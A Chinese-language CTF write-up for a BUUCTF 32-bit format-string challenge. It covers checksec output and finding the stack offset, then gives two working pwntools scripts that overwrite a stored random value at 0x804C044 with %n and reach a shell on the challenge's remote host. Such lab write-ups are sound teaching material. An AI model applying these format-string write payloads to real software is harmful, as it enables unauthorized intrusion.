题目

平台：BUUCTF

题目：[第五空间2019 决赛]PWN5

考点：32位格式化字符串（任意地址写）

分析

checksec查看防护状态

ubuntu@ubuntu-vm:~/Desktop/pwn$ checksec pwn
[*] '/home/ubuntu/Desktop/pwn/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

IDA反编译源码，看到主要功能是通过rand生成一个随机数存储在0x804C044，然后输入passwd去猜这个随机数

刚好第21行存在格式化字符串漏洞，我们可以利用这个格式化字符串漏洞去修改0x804C044的值，最后输入替换后的值使if为真，从而执行后门函数

调试分析

先通过%p看read输入的参数在栈上第几个

数一下确定位置是第十个参数，那么就可以把0x804C044写入第十个参数的位置，然后使用%10$n给其写入，写入的值就是输入内容前面的长度，因为是32位，所以前面的地址长度就是4，那么0x804C044地址的值就被改为了4

漏洞利用

地址在前

from pwn import *
from LibcSearcher import *

context(log_level = 'debug', arch = 'i386', os = 'linux')
p = remote('node5.buuoj.cn', 26022)
#p=process('./pwn')

guess_num_addr = 0x804C044

payload = p32(guess_num_addr) + b'%10$n'
p.sendlineafter(b'name:', payload)

p.sendlineafter(b'passwd:', b'4')
p.interactive()

地址在后

由于是32位，所以是4个字节，那么就要把%10$n前面填充3个A使其刚好等于8个字节，导致要写入的地址在栈上往后移了两个，所以要把%10$n改成%12$n

同时由于格式化字符串前面的字符有3个A，所以%n写入的数字就是3，那么在输入密码时也就需要改成3了

from pwn import *
from LibcSearcher import *

context(log_level = 'debug', arch = 'i386', os = 'linux')
p = remote('node5.buuoj.cn', 26022)
#p=process('./pwn')

guess_num_addr = 0x804C044

payload = b'AAA%12$n' + p32(guess_num_addr)
p.sendlineafter(b'name:', payload)

p.sendlineafter(b'passwd:', b'3')
p.interactive()